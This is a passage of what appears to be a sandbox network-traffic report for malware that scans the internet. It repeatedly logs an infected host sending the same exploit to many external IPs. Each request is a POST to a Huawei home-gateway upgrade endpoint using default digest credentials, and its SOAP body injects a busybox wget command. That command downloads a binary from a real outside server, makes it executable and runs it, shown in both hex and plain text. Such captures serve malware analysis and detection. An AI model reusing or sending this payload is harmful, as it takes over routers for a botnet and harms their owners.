                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1699192.168.2.1547286156.81.136.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944854975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1700192.168.2.1552960181.9.30.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944869041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1701192.168.2.1553662181.93.240.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944889069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1702192.168.2.1535454102.238.136.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944914103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1703192.168.2.153472245.76.92.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944936991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1704192.168.2.1546608190.136.243.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944955111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1705192.168.2.1533862135.213.111.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944968939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1706192.168.2.1544182197.72.226.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944993019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1707192.168.2.1553504138.224.48.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945024014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1708192.168.2.1535348102.208.75.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945050001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1709192.168.2.1559942197.142.194.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945077896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
